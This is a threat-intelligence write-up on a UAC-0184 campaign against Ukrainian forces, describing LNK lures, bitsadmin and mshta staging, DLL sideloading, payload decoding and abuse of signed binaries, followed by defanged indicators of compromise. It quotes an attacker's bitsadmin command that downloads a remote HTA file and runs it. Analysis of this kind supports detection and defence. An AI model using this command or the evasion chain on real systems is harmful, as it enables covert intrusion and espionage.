UAC-0184’s Evolution: Bitsadmin Abuses, Obfuscated RTTI, and LZNT1 Decompression

The threat actor designated as UAC-0184 has deployed a sophisticated, multi-stage malware infection chain designed to bypass modern endpoint defenses. By abusing legitimate Windows utilities like bitsadmin and HTA (HTML Application) loaders, the group successfully delivers a heavily obfuscated payload bundle.

To maintain a low profile within Ukrainian military networks, the final stage of the attack hijacks signed, trusted binaries—specifically VSLauncher.exe and PassMark Endpoint—to mask its network activity as legitimate system processes.

Reports from CERT-UA spanning 2024–2025 indicate a persistent campaign targeting the Armed Forces of Ukraine. The social engineering component is highly contextual, utilizing lures themed around military documentation, combat footage, and personal correspondence to entice high-value targets.

Technical analysis reveals a preference for staged loaders and a hybrid approach that blends custom-coded malware with commercially available tools. The specific sample analyzed here bears the “UKR” tag in MalwareBazaar and utilizes localized filenames such as “Рапорт” (report) and “Таблиця” (table), strongly aligning with documented UAC-0184 tradecraft.

According to a technical report by Synaptis Systems, UAC-0184 is a Russia-aligned cluster frequently engaged in cyber-espionage against Ukrainian government and military infrastructure via various messaging and dating platforms. While metadata alone is not definitive proof, the high degree of overlap in infrastructure and TTPs (Tactics, Techniques, and Procedures) provides strong evidence for this attribution.

The Infection Vector: Bitsadmin and HTA Execution

The initial delivery mechanism consists of a ZIP archive containing three Windows shortcut (LNK) files. These files are cleverly disguised as standard office documents, such as PDF scans, Word reports, and Excel spreadsheets.

While the LNK files appear to point to cmd.exe within System32, the actual malicious logic resides in the command-line arguments. These arguments invoke bitsadmin to download an HTA file from a remote server, which is then executed via mshta.exe from the user’s temporary directory. The command pattern typically follows this structure:

bitsadmin /transfer myjob /download /priority foreground hxxp://169.40.135[.]35/dctrpr/<name>.hta %TEMP%\~tmp(…).hta && mshta.exe %TEMP%\~tmp(…).hta

The use of the IP address 169.40.135[.]35 across all lures suggests a centralized staging host. Notably, direct browser requests to these URLs often fail, suggesting the attacker has implemented server-side gating—such as geofencing or specific user-agent filtering—to evade automated sandbox analysis.

Tracking the delivery with Kraken (Source : Synaptis systems).

Once the HTA file is executed, it leverages JScript to instantiate a WScript.Shell ActiveX object. This allows the attacker to launch PowerShell with hidden windows, no profile loading, and a bypassed ExecutionPolicy, effectively minimizing the forensic footprint left on the host.

This PowerShell stage downloads a ZIP archive named dctrprraclus.zip into the %APPDATA% directory, extracts it, and simultaneously launches Cluster-Overlay64.exe alongside a decoy PDF. This dual-action execution serves two purposes: it provides the user with a benign visual outcome while the primary payload executes silently in the background.

DLL Sideloading and Obfuscated Payloads

The dctrprraclus.zip archive contains a specialized environment built around Cluster-Overlay64.exe, a legitimate component of the Plane9 3D music visualizer. The presence of Plane9Engine.dll and openvr_api.dll confirms a classic DLL sideloading technique, where a trusted executable is coerced into loading a malicious dependency.

Sideload chain (Source : Synaptis systems).

Static analysis of openvr_api.dll shows it avoids standard string usage, instead employing obfuscated RTTI-like strings within the .rdata section to reference kernel-diag.lib and filter.bin. The DLL dynamically resolves required APIs by walking the kernel32 export table. It then decodes a data region using a 32-bit addition algorithm with an embedded key, effectively acting as a multi-stage loader.

The next stage, filter.bin, utilizes a highly creative “steganographic” approach. While the file appears to be random data, it actually contains a sequence of valid PNG chunks. The embedded shellcode iterates through these chunks, concatenates the IDAT data, and applies a DWORD-wise XOR operation with a constant key. The resulting stream is then passed through an LZNT1 decompression routine (compatible with Windows RtlDecompressBuffer semantics).

Frequency analysis of the IDAT stream confirms that once the correct XOR key is applied, the data reveals clear PE (Portable Executable) signatures. This process yields a ~2 MB bundle containing configuration data and several back-to-back PE files.

Final Stage: Hijacking Signed Network Stacks

The unpacked bundle includes eight legitimate, digitally signed binaries, such as unzip.exe and SqlExpressChk.exe. The infection chain’s ultimate goal is to drop input.dll into %windir%\SysWOW64\ and execute VSLauncher.exe, which then sideloads the malicious DLL within a trusted Microsoft-signed process context.

In a final move to evade network detection, the malware leverages PassMark Endpoint. This legitimate utility provides a network test service that listens on UDP multicast (224.0.0.255:31339) and uses a custom TCP protocol on port 31339. By hijacking this environment, UAC-0184 gains a fully signed, non-suspicious network stack. The resulting multicast discovery and bidirectional TCP traffic can easily blend in with standard diagnostic or network management traffic, while also granting the attacker access to process dumping capabilities for data exfiltration.

Command and Control (C2) Observations

Interestingly, analysts have not identified any hardcoded external C2 domains beyond the initial staging IP. Strings found in the decoded shellcode (e.g., "%y…EF{DATA=") suggest that C2 addresses are injected at runtime. This could occur via multicast discovery, parameters passed by the operator, or secondary local artifacts, making traditional domain-based blocking difficult.

This evolution in UAC-0184’s tradecraft—moving from simple HTA loaders to complex, multi-layered sideloading of signed multimedia and diagnostic tools—demonstrates a clear shift toward deep obfuscation designed to frustrate both static and behavioral detection engines.

Indicators of Compromise (IOCs)

Network Indicators

hxxp://169.40.135[.]5/dctrpr/slippersuppity.hta
hxxp://169.40.135[.]35/dctrpr/basketpast.hta
hxxp://169.40.135.[35]/dctrpr/agentdiesel.hta
hxxp://169.40.135.[35]/dctrprraclus.zip
224.0.0[.]255:31339 UDP (PassMark multicast)
31339/tcp (BurnInTest data channel)

File Hashes (SHA-256)

kernel-diag.lib: dc6cddc391b373b18f105f49a80ff83d53b430d8dea35c1f1576832fa9fbd2b3
filter.bin: f5ca9c53d1537142889d7172c6643e886b2164233b91f0fc2d41ca010f035372
openvr_api.dll: df6942dc1a89226359adf1aac597c3b270f4a408214b4f7c2083f9524605e0f7
input.dll: b811f28b844eff8c1f4f931639bed5bcc41113364fdfc44d7703259457839edb
PE_08 SqlExpChk: 33e44dea247eaa8b0fc8ed1f8ed575905f6ce0b7119337ddd29863bbb03288b3

Note: IP addresses and domains are defanged to prevent accidental execution. Please re-fang these indicators only within secure threat intelligence platforms.

Related Articles

Back to top button